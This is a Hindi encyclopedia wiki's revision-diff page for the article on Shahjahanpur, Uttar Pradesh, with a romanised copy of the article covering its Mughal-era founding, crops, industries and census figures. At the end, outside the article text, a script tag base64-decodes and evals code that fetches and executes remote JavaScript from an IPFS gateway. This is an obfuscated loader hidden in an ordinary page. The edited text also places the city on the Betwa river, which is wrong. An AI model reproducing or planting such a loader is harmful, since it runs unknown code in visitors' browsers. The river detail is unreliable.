Difference between revisions of "शाहजहाँपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
{{tocright}}
+
'''शाहजहाँपुर''', उत्तर-मध्य, [[उत्तर प्रदेश|उत्तर प्रदेश राज्य]], [[उत्तर भारत]] में है। यह [[लखनऊ]] से लगभग 160 किलोमीटर पश्चिमोत्तर में [[बेतवा नदी]] के किनारे [[बरेली]] से दक्षिण-पूर्व में स्थित है।
शाहजहाँपुर, उत्तर-मध्य, [[उत्तर प्रदेश]] राज्य, उत्तर [[भारत]] में है। यह [[लखनऊ]] से लगभग 160 किलोमीटर पश्चिमोत्तर में देवता नदी के किनारे [[बरेली]] से दक्षिण-पूर्व में स्थित है।
 
 
==इतिहास==
 
==इतिहास==
इस शहर की स्थापना 1647 में हुई और इसका नाम [[मुग़ल]] बादशाह [[शाहजहाँ]] पर रखा गया।
+
इस नगर की स्थापना [[मुग़ल]] [[शाहजहाँ|बादशाह शाहजहाँ]] के शासन काल में बहादुर ख़ाँ तथा दिलेर ख़ाँ ने 1647 ई. में की थी।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= भारतकोश पुस्तकालय|संपादन= |पृष्ठ संख्या=897|url=}}</ref> बादशाह के नाम पर ही इस नगर का नाम शाहजहाँपुर रखा गया था।
 
==यातायात और परिवहन==
 
==यातायात और परिवहन==
 
शाहजहाँपुर सड़क व रेल जंक्शन द्वारा जुड़ा हुआ है। [[उत्तर प्रदेश]] के इस जनपद में [[विनोवा सेवा आश्रम, शाहजहांपुर| विनोवा सेवा आश्रम]] स्थित है
 
शाहजहाँपुर सड़क व रेल जंक्शन द्वारा जुड़ा हुआ है। [[उत्तर प्रदेश]] के इस जनपद में [[विनोवा सेवा आश्रम, शाहजहांपुर| विनोवा सेवा आश्रम]] स्थित है
Line 13: Line 12:
 
[[2001]] की जनगणना के अनुसार इस क्षेत्र की जनसंख्या 2,97,932, ग्रामीण क्षेत्र की जनसंख्या 20,503 और ज़िले की कुल जनसंख्या 25,49,458 है।  
 
[[2001]] की जनगणना के अनुसार इस क्षेत्र की जनसंख्या 2,97,932, ग्रामीण क्षेत्र की जनसंख्या 20,503 और ज़िले की कुल जनसंख्या 25,49,458 है।  
  
{{प्रचार}}
+
{{लेख प्रगति |आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध=}}
{{लेख प्रगति  
+
==टीका टिप्पणी और संदर्भ==
|आधार=
+
<references/>
|प्रारम्भिक=प्रारम्भिक1  
 
|माध्यमिक=  
 
|पूर्णता=  
 
|शोध=
 
}}
 
 
==संबंधित लेख==
 
==संबंधित लेख==
{{उत्तर प्रदेश के नगर}}
+
{{उत्तर प्रदेश के नगर}}{{उत्तर प्रदेश के पर्यटन स्थल}}
{{उत्तर प्रदेश के पर्यटन स्थल}}
+
[[Category:उत्तर प्रदेश]][[Category:उत्तर प्रदेश के नगर]][[Category:भारत के नगर]][[Category:मुग़ल साम्राज्य]][[Category:उत्तर प्रदेश के ऐतिहासिक स्थान]][[Category:ऐतिहासिक स्थान कोश]][[Category:इतिहास कोश]]
 
__INDEX__
 
__INDEX__
 
[[Category:उत्तर प्रदेश]]
 
[[Category:उत्तर प्रदेश के नगर]]
 
[[Category:मुग़ल साम्राज्य]]
 

Revision as of 11:30, 19 August 2014

shahajahaanpur, uttar-madhy, uttar pradesh rajy, uttar bharat mean hai. yah lakhanoo se lagabhag 160 kilomitar pashchimottar mean betava nadi ke kinare bareli se dakshin-poorv mean sthit hai.

itihas

is nagar ki sthapana mugal badashah shahajahaan ke shasan kal mean bahadur khaan tatha diler khaan ne 1647 ee. mean ki thi.[1] badashah ke nam par hi is nagar ka nam shahajahaanpur rakha gaya tha.

yatayat aur parivahan

shahajahaanpur s dak v rel jankshan dvara ju da hua hai. uttar pradesh ke is janapad mean vinova seva ashram sthit hai

krishi aur khanij

shahajahaanpur ek krishi vyapar keandr bhi hai. is kshetr mean chaval, gehooan, ganna aur jau adi ki kheti hoti hai. shahajahaanpur ganga nadi ke uttari kachhari maidan mean sthit hai.

vyapar aur udyog

yahaan qalin, sharab, chini aur rasayan nirman se ju de anek udyog haian.

janasankhya

2001 ki janaganana ke anusar is kshetr ki janasankhya 2,97,932, gramin kshetr ki janasankhya 20,503 aur zile ki kul janasankhya 25,49,458 hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |sankalan: bharatakosh pustakalay |prishth sankhya: 897 |

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>